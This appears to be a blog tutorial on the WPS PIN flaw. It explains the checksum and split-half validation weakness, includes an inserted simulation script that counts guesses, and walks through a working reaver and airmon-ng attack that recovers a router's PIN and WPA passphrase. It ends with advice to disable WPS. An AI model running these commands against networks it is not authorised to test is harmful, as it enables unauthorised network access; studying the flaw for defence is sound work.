WPS - A key to every network

DISCLAIMER: Don't try using this against your neighbour's Wi-Fi... or bank's... or employer's... You've been warned.

This article was requested by a certain batman... looks like modern crimes require modern superhero gadgets.

WPS... I believe it stands for "Wi-Fi Protected Setup" which, to be totally honest, is quite ironic. Nowadays, I think a much more fitting name would be "Wi-Fi Penetration System" since I can guarantee you that every network you spot with WPS enabled is hackable in less than 3/4 hours. Interesting? Well, let me show you.

Why WPS is crap - short summary

WPS uses 8-digit PINs to authenticate new devices in the Wi-Fi network. Usually, you would firstly press a big, dumb WPS button on your router, and then select a WPS-connect option on a device you wish to connect. You might think WPS is great as it's simple to use, and yet very secure thanks to a long and random PIN. Right? Right...? NOPE.

First and foremost, even if the PINs were not as flawed as they are, an 8-digit number is not really that hard to brute force. Sure, it would take longer than a couple of hours, but it's definitely not something that would keep a potential attacker out for too long.

Problem is... WPS PINs are not really 8 digits long.

In 2011, a security researcher named Stefan Viehböck discovered a flaw in the WPS PIN implementation:

  • the last digit of each PIN is actually a checksum, which can be calculated from the other 7 digits;
  • the PIN is validated by dividing it into 2 halves: the first half leaves 10,000 guesses & the second half leaves 1,000 guesses;
  • the two halves of the PIN are often not properly randomized, which makes running a tool like Reaver that much easier (more on that later).

Why is it that bad? Well, if the PINs were treated just as a single, long number, the total of brute force guesses you'd have to try before cracking WPS could, in the worst-case scenario, reach 100,000,000. With the PIN only having 7 "real" digits and being split into two halves at the verification stage, in reality, we're only looking at 11,000 guesses... AT MOST.
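To make the arithmetic above concrete, here is an added example (not code from the original article) that computes the checksum digit and counts guesses against an in-memory model of split validation. The `SplitValidator` class and function names are hypothetical, and nothing here touches a radio or network.

```python
def wps_checksum(first7: int) -> int:
    """Eighth PIN digit, derived entirely from the first seven."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def make_pin(first7: int) -> str:
    """Full 8-digit PIN: seven free digits plus the checksum."""
    return f"{first7:07d}{wps_checksum(first7)}"


class SplitValidator:
    """Hypothetical in-memory model: each PIN half is confirmed on its own."""

    def __init__(self, pin: str):
        self.pin, self.attempts = pin, 0

    def first_half_ok(self, half: str) -> bool:
        self.attempts += 1
        return half == self.pin[:4]

    def second_half_ok(self, half: str) -> bool:
        self.attempts += 1
        return half == self.pin[4:]


def attempts_to_exhaust(pin: str) -> int:
    """Guesses needed when the two halves can be searched independently."""
    ap = SplitValidator(pin)
    first = 0
    for first in range(10_000):            # 4 free digits in the first half
        if ap.first_half_ok(f"{first:04d}"):
            break
    for tail in range(1_000):              # 3 free digits; the 4th is the checksum
        if ap.second_half_ok(make_pin(first * 1000 + tail)[4:]):
            break
    return ap.attempts


if __name__ == "__main__":
    worst = make_pin(9_999_999)            # constructed worst-case PIN
    print("single 8-digit number:", 10**8)
    print("7 free digits, no split:", 10**7)
    print("split validation, worst case:", attempts_to_exhaust(worst))
```

The worst case under split validation is 10,000 + 1,000 guesses, four orders of magnitude below the 100,000,000 a single 8-digit number would require.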

Let's attack a WPS network

In this tutorial, I'm going to assume a few things just to make it easier:

  1. The attacker (us) knows how to use the CLI and understands the basics of *NIX;
  2. The attacker's device has a network card suitable for this attack (either built-in or attached via USB);
  3. The attacker's OS (Kali, Fedora, Mac etc. etc.) is installed on physical hardware, not a VM.

Right, let's move on to the actual tutorial:

1) Install airmon-ng (scanning) and reaver (cracking);

2) Stop services which could interfere with airmon-ng (network-manager etc.); if airmon-ng check complains about "processes which could cause trouble", you can kill -9 <pid> them and try again;

vlku@l33th4xx0r.wpswifi.lab : airmon-ng check
Found 1 process that could cause trouble.
PID Name
100 avahi-daemon

vlku@l33th4xx0r.wpswifi.lab : kill -9 100

vlku@l33th4xx0r.wpswifi.lab : airmon-ng check
No interfering processes found.

3) Once that's all done, you can start the scan:

vlku@l33th4xx0r.wpswifi.lab : ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlp2s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000
    link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff
vlku@l33th4xx0r.wpswifi.lab : airmon-ng start wlp2s0
No interfering processes found.
PHY    Interface Driver    Chipset
phy0   wlp2s0    ath9k     Atheros AR9485        

4) With that started, we can proceed to dump the captured packets (CTRL+C to stop):

vlku@l33th4xx0r.wpswifi.lab : airodump-ng wlp2s0
BSSID             PWR  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER  AUTH  ESSID 

XX:XX:XX:XX:XX:XX -90  7        0       0    4   54e WPA2 CCMP    PSK   WPSWIFI

5) The important bit from that output is the AP's MAC (represented here with XX:XX:XX:XX:XX:XX) and a channel (in this case, 4). We can use it to run reaver and start cracking:

vlku@l33th4xx0r.wpswifi.lab : reaver -i wlp2s0 -b XX:XX:XX:XX:XX:XX -c 4 -K 1 -vv

After a while, reaver should finally return something similar to this (in my experience, it never took more than 2 hours):

[Pixie-Dust]  Pixiewps 1.1
[Pixie-Dust]  [*] E-S1 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]  [*] E-S2 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]  [*] WPS pin: 12345678
[Pixie-Dust]  [*] Time taken: 60 s
Running reaver with the correct pin, wait...
Cmd: reaver -i wlp2s0 -b XX:XX:XX:XX:XX:XX -c 4 -K 1 -vv

[Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
[Reaver Test] Channel: 4
[Reaver Test] [*] WPS PIN: '12345678'
[Reaver Test] [*] WPA PSK: 'SECUREASF*CK'
[Reaver Test] [*] AP SSID: 'WPSWIFI'

And that's it! We've got a working PIN. WPS at its best right there.

Disclaimer & summary

This article should only be used for learning purposes. Never hack into a network which you don't own or which you weren't asked to penetrate (and for sure don't use my article to learn how to leech your neighbour's Wi-Fi, Mr Batman).

As you can see, WPS is very bad and is in reality just a huge backdoor to your network. Best practice is to keep it disabled AT ALL TIMES. Don't purchase hardware which requires you to connect to Wi-Fi via WPS.
